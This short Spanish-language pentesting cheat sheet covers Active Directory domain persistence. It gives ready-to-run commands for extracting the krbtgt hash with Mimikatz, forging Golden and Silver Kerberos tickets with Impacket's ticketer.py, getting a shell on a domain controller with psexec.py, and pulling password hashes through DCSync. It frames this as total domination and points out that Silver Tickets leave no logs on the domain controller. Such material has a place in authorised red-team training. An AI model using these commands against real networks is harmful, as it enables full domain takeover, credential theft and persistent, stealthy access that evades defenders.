Salta el contingut

Domain Persistence (Golden Ticket)

[!danger] Total Domination Si comprometes el DC y extraes el hash krbtgt, eres Dios. Puedes forjar tickets válidos "para siempre" (10 años), incluso si el usuario Admin cambia su password.

1. Prerequisites

Necesitas: 1. KRBTGT Hash (NTLM). Extráelo con Mimikatz (lsadump::lsa /patch) o ntds.dit. 2. Domain SID. (whoami /user)

2. Golden Ticket (Impacket)

Crear un ticket TGT falso para el usuario "Administrator" (o uno inventado).

# S-1-5-... es el SID del dominio (quita el -500 del final)
ticketer.py -nthash <KRBTGT_HASH> -domain-sid <SID> -domain <DOMAIN> administrator

# Exportar ticket para uso
export KRB5CCNAME=administrator.ccache

# Usar ticket
psexec.py <DOMAIN>/administrator@<DC_HOSTNAME> -k -no-pass

3. DCSync (Mimikatz)

Si tienes un usuario con permisos de replicación (ej: Domain Admins), puedes pedirle al DC que te escupa los hashes de otros usuarios. No necesitas loguearte en el DC.

# Desde Kali con secretos de secretsdump
secretsdump.py <DOMAIN>/<USER>:<PASS>@<IP> -just-dc-user Administrator

# Desde Windows (Mimikatz)
lsadump::dcsync /domain:<DOMAIN> /user:Administrator

4. Silver Ticket

Falsificar un TGS para un servicio específico (ej: CIFS/SMB en el FileServer). Menos poderoso que Golden, pero mucho más sigiloso (no genera logs en el DC). Necesitas el hash NTLM de la Cuenta de Servicio (computadora), no krbtgt.

ticketer.py -nthash <MACHINE_HASH> -domain-sid <SID> -domain <DOMAIN> -spn cifs/<HOSTNAME> administrator